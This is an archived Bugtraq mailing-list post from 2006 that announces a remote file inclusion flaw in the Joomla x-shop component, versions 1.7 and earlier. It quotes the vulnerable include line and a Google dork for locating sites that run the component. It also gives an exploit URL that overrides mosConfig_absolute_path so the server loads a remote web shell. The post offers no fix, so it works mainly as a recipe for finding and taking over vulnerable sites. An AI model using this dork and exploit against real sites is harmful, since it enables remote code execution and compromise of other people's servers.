[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Joomla x-shop <= 1.7 Remote File Include Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Joomla x-shop <= 1.7 Remote File Include Vulnerability
- From: crackers_child@xxxxxxxxxxxxxxxxxxx
- Date: 18 Aug 2006 10:04:39 -0000
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@xxxxxxxxxxxxxxxxxxx
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_x-shop/"
-------------------------
-------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All My Friends And SiberSavascilar.Com Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ]
--------------------------------------